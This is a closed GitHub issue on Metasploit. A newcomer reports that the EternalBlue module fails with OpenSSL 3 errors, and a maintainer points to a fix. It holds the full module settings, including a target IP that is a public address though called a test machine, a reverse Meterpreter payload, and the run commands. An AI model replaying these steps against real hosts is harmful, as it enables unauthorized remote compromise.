Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Metasploit error when using eternalblue on a vulnerable test machine and weird lines when running metasploit #16868

Closed
HEX-VON opened this issue Aug 5, 2022 · 7 comments
Closed

Metasploit error when using eternalblue on a vulnerable test machine and weird lines when running metasploit #16868

HEX-VON opened this issue Aug 5, 2022 · 7 comments
Labels
bug openssl3 Tracking issues related to OpenSSL 3's backwards breaking changes Stale Marks an issue as stale, to be closed if no action is taken

Comments

@HEX-VON
Copy link

HEX-VON commented Aug 5, 2022
edited
Loading

I am new to pen testing and i have been getting this error when i try to use eternalblue on a test machine and can't find a fix for it. i also get weird lines when running metasploit
Untitl23ed

Untitle1d

Steps to reproduce

How'd you do it?

  1. use ms17_010_eternalblue

  2. run the exploit after configuring the payload and exploit options

OS: Windows 7 Professional 7600 of the test machine

Were you following a specific guide/tutorial or reading documentation?

nope
If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.

Expected behavior

the exploit should run normally
What should happen?
gain access to test machine

Current behavior

getting error after running the exploit
What happens instead?
exploit fails with error

Metasploit version

Framework: 6.2.9-dev
Console : 6.2.9-dev

Additional Information

metasploit versions is 6.2.9

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse 
[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/windows/smb/ms17_010_eternalblue

[windows/smb/ms17_010_eternalblue]
CheckModule=auxiliary/scanner/smb/smb_ms17_010
EXITFUNC=thread
WfsDelay=5
WORKSPACE=
VERBOSE=false
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=62.141.46.121
RPORT=445
SSL=false
SSLServerNameIndication=
SSLVersion=Auto
SSLVerifyMode=PEER
SSLCipher=
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
TCP::max_send_size=0
TCP::send_delay=0
SMBUser=
SMBPass=
SMBDomain=
VERIFY_TARGET=true
VERIFY_ARCH=true
ProcessName=spoolsv.exe
GroomAllocations=12
MaxExploitAttempts=3
GroomDelta=5
PAYLOAD=windows/x64/meterpreter/reverse_tcp
LHOST=192.168.1.12

Database Configuration

The database contains the following information:

Collapse 
Session Type: postgresql selected, no connection

History

The following commands were ran during the session and before this issue occurred:

Collapse 
60     set loglevel 3
61     search eternalblue
62     use 0
63     set rhosts 62.141.46.121
64     run
65     debug

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse 
[08/05/2022 18:12:38] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:12:38] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:15:32] [e(0)] core: Failed to connect to the database: No database YAML file
[08/05/2022 18:15:35] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:15:35] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:15:35] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:17:10] [e(0)] core: Failed to connect to the database: No database YAML file
[08/05/2022 18:17:12] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:17:12] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:17:12] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse 
msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse 
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_eternalblue]: bind to bind
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_eternalblue]: noconn to bind
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_eternalblue]: none to bind
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_eternalblue]: tunnel to bind
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/bind_tcp_uuid is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_eternalblue]: reverse to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_eternalblue]: bind to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_eternalblue]: noconn to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_eternalblue]: none to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_eternalblue]: tunnel to tunnel
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_http is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_eternalblue]: reverse to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_eternalblue]: bind to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_eternalblue]: noconn to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_eternalblue]: none to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_eternalblue]: tunnel to tunnel
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_https is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_eternalblue]: reverse to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_eternalblue]: bind to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_eternalblue]: noconn to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_eternalblue]: none to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_eternalblue]: tunnel to reverse
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_tcp is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_eternalblue]: reverse to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_eternalblue]: bind to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_eternalblue]: noconn to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_eternalblue]: none to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_eternalblue]: tunnel to reverse
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_rc4 is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_eternalblue]: reverse to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_eternalblue]: bind to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_eternalblue]: noconn to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_eternalblue]: none to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_eternalblue]: tunnel to reverse
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_uuid is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_eternalblue]: reverse to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_eternalblue]: bind to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_eternalblue]: noconn to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_eternalblue]: none to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_eternalblue]: tunnel to tunnel
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_winhttp is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_eternalblue]: reverse to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_eternalblue]: bind to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_eternalblue]: noconn to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_eternalblue]: none to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_eternalblue]: tunnel to tunnel
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_winhttps is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:36] [i(2)] core: Reloading auxiliary module scanner/smb/smb_ms17_010. Ambiguous module warnings are safe to ignore
[08/05/2022 18:17:36] [d(0)] core: SMB version(s) to negotiate: [1]
[08/05/2022 18:17:37] [d(0)] core: Negotiated SMB version: SMB1

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse 
msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Collapse 
Framework: 6.2.9-dev
Ruby: ruby 3.0.4p208 (2022-04-12 revision 3fa771dded) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.0.3 3 May 2022
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
@HEX-VON HEX-VON added the bug label Aug 5, 2022
@adfoster-r7 adfoster-r7 added the openssl3 Tracking issues related to OpenSSL 3's backwards breaking changes label Aug 5, 2022
@adfoster-r7
Copy link
Contributor

This should be fixed by #16800 which is available in the latest release of Metasploit

I'm not sure when the fix will be available in Kali, I believe in a week or so.

@HEX-VON
Copy link
Author

HEX-VON commented Aug 6, 2022

This should be fixed by #16800 which is available in the latest release of Metasploit

I'm not sure when the fix will be available in Kali, I believe in a week or so.

i tried the steps in #16800 but still no luck sadly

@HEX-VON
Copy link
Author

HEX-VON commented Aug 7, 2022

updated to metasploit v6.2.12-dev and still no luck

@adfoster-r7
Copy link
Contributor

The ssl warnings should be fixed in 6.2.14; The target may need reset to get a reverse shell with

@github-actions
Copy link

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Oct 18, 2022
@github-actions
Copy link

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug openssl3 Tracking issues related to OpenSSL 3's backwards breaking changes Stale Marks an issue as stale, to be closed if no action is taken
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@adfoster-r7 @HEX-VON and others